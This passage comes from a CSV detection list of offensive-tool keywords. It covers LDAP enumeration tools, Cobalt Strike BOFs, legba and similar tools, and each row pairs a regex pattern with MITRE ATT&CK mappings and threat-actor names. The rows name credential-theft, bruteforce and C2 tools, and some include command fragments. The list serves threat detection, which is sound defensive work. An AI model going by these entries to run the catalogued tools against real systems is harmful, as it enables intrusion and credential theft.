Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*ldapdomaindump.zip*",".{0,1000}ldapdomaindump\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*ldapfilter:*admincount=1* /format:hashcat*",".{0,1000}ldapfilter\:.{0,1000}admincount\=1.{0,1000}\s\/format\:hashcat.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*LdapMiner*",".{0,1000}LdapMiner.{0,1000}","offensive_tool_keyword","ldapminer","This is a tool I wrote to collect information from different LDAP Server implementation. 
This was written in C with the Netscape C","T1016 - T1018 - T1021 - T1046 - T1056 - T1069 - T1078 - T1087 - T1114 - T1482 - T1526 - T1597","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Discovery","https://sourceforge.net/projects/ldapminer/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*ldapnomnom *",".{0,1000}ldapnomnom\s.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","6","10","958","76","2024-02-19T18:12:13Z","2022-09-18T10:35:09Z" "*ldapnomnom --input*",".{0,1000}ldapnomnom\s\-\-input.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","0","N/A","6","10","958","76","2024-02-19T18:12:13Z","2022-09-18T10:35:09Z" "*ldapnomnom-darwin-*",".{0,1000}ldapnomnom\-darwin\-.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","6","10","958","76","2024-02-19T18:12:13Z","2022-09-18T10:35:09Z" "*ldapnomnom-linux-*",".{0,1000}ldapnomnom\-linux\-.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","6","10","958","76","2024-02-19T18:12:13Z","2022-09-18T10:35:09Z" 
"*ldapnomnom-main*",".{0,1000}ldapnomnom\-main.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","6","10","958","76","2024-02-19T18:12:13Z","2022-09-18T10:35:09Z" "*ldapnomnom-windows-386.exe*",".{0,1000}ldapnomnom\-windows\-386\.exe.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","6","10","958","76","2024-02-19T18:12:13Z","2022-09-18T10:35:09Z" "*ldapnomnom-windows-amd64.exe*",".{0,1000}ldapnomnom\-windows\-amd64\.exe.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","6","10","958","76","2024-02-19T18:12:13Z","2022-09-18T10:35:09Z" "*ldapnomnom-windows-arm64.exe*",".{0,1000}ldapnomnom\-windows\-arm64\.exe.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","6","10","958","76","2024-02-19T18:12:13Z","2022-09-18T10:35:09Z" "*LDAP-Password-Hunter*",".{0,1000}LDAP\-Password\-Hunter.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/oldboy21/LDAP-Password-Hunter","1","1","N/A","10","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*ldaprelayclient.py*",".{0,1000}ldaprelayclient\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*ldaprelayclient.py*",".{0,1000}ldaprelayclient\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*LdapRelayScan.py*",".{0,1000}LdapRelayScan\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*LdapRelayScan.py*",".{0,1000}LdapRelayScan\.py.{0,1000}","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1557","TA0001 - TA0006","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","8","5","427","61","2024-03-13T20:04:51Z","2022-01-16T06:50:44Z" "*LdapRelayScan-main*",".{0,1000}LdapRelayScan\-main.{0,1000}","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1557","TA0001 - TA0006","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","8","5","427","61","2024-03-13T20:04:51Z","2022-01-16T06:50:44Z" "*ldapsearchad.py*",".{0,1000}ldapsearchad\.py.{0,1000}","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - 
TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","1","N/A","5","2","142","32","2024-03-25T13:05:26Z","2019-12-08T00:25:57Z" "*ldapsearch-ad.py*",".{0,1000}ldapsearch\-ad\.py.{0,1000}","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","1","N/A","5","2","142","32","2024-03-25T13:05:26Z","2019-12-08T00:25:57Z" "*ldap-searcher *",".{0,1000}ldap\-searcher\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*ldapsentinel * raw *",".{0,1000}ldapsentinel\s.{0,1000}\sraw\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*ldapsentinel forest 
user*",".{0,1000}ldapsentinel\sforest\suser.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*LdapSignCheck.exe*",".{0,1000}LdapSignCheck\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","161","24","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" "*LdapSignCheck.Natives*",".{0,1000}LdapSignCheck\.Natives.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","161","24","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" "*LdapSignCheck.sln*",".{0,1000}LdapSignCheck\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - 
FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","161","24","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" "*ldapsigncheck.x64.*",".{0,1000}ldapsigncheck\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","161","24","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" "*ldapsigncheck.x86.*",".{0,1000}ldapsigncheck\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - 
T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","161","24","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" "*LDAPWordlistHarvester.ps1*",".{0,1000}LDAPWordlistHarvester\.ps1.{0,1000}","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","288","22","2024-03-14T17:52:34Z","2023-09-22T10:10:10Z" "*LDAPWordlistHarvester.py*",".{0,1000}LDAPWordlistHarvester\.py.{0,1000}","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","288","22","2024-03-14T17:52:34Z","2023-09-22T10:10:10Z" "*LDAPWordlistHarvester-main*",".{0,1000}LDAPWordlistHarvester\-main.{0,1000}","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from 
the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","288","22","2024-03-14T17:52:34Z","2023-09-22T10:10:10Z" "*ldd2bloodhound*",".{0,1000}ldd2bloodhound.{0,1000}","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Discovery","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","10","10","1068","180","2024-02-13T12:41:07Z","2016-05-24T18:46:56Z" "*ldeep cache *",".{0,1000}ldeep\scache\s.{0,1000}","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","0","N/A","5","4","342","39","2024-03-28T10:30:53Z","2018-10-22T18:21:44Z" "*ldeep ldap -u *",".{0,1000}ldeep\sldap\s\-u\s.{0,1000}","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","0","N/A","5","4","342","39","2024-03-28T10:30:53Z","2018-10-22T18:21:44Z" "*ldeep*activedirectory.py*",".{0,1000}ldeep.{0,1000}activedirectory\.py.{0,1000}","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","5","4","342","39","2024-03-28T10:30:53Z","2018-10-22T18:21:44Z" "*ldeep*ldap_activedirectory.py*",".{0,1000}ldeep.{0,1000}ldap_activedirectory\.py.{0,1000}","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","5","4","342","39","2024-03-28T10:30:53Z","2018-10-22T18:21:44Z" 
"*ldeep_dump_users_enabled.json",".{0,1000}ldeep_dump_users_enabled\.json","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","5","4","342","39","2024-03-28T10:30:53Z","2018-10-22T18:21:44Z" "*ldeep_dump_users_enabled.lst",".{0,1000}ldeep_dump_users_enabled\.lst","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","5","4","342","39","2024-03-28T10:30:53Z","2018-10-22T18:21:44Z" "*ldeep_enum*",".{0,1000}ldeep_enum.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*ldif2john.pl*",".{0,1000}ldif2john\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*LDPreloadPrivesc*",".{0,1000}LDPreloadPrivesc.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*LdrLockLiberator-main*",".{0,1000}LdrLockLiberator\-main.{0,1000}","offensive_tool_keyword","LdrLockLiberator","LdrLockLiberator is a collection of techniques for escaping or otherwise forgoing Loader Lock while executing your code from DllMain or anywhere else the lock may be present.","T1574.002 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/ElliotKillick/LdrLockLiberator","1","0","N/A","9","4","313","55","2024-04-28T21:16:21Z","2023-10-31T10:11:16Z" "*leaky/leakbuf.go*",".{0,1000}leaky\/leakbuf\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*leapsecurity*",".{0,1000}leapsecurity.{0,1000}","offensive_tool_keyword","Github Username","github repo name hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/leapsecurity","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*leechristensen/UnmanagedPowerShell*",".{0,1000}leechristensen\/UnmanagedPowerShell.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","1","N/A","6","5","461","108","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z" "*leftp/BackupCreds*",".{0,1000}leftp\/BackupCreds.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from 
Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/leftp/BackupCreds","1","1","N/A","9","1","51","6","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z" "*legalhackers.com/exploits/CVE*",".{0,1000}legalhackers\.com\/exploits\/CVE.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*legba * --username*",".{0,1000}legba\s.{0,1000}\s\-\-username.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba amqp *--target *",".{0,1000}legba\samqp\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba dns *--data *",".{0,1000}legba\sdns\s.{0,1000}\-\-data\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba ftp *--target *",".{0,1000}legba\sftp\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 
- TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba http *--http-payload *",".{0,1000}legba\shttp\s.{0,1000}\-\-http\-payload\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba http.basic *--target *",".{0,1000}legba\shttp\.basic\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba http.enum *--http*",".{0,1000}legba\shttp\.enum\s.{0,1000}\-\-http.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and 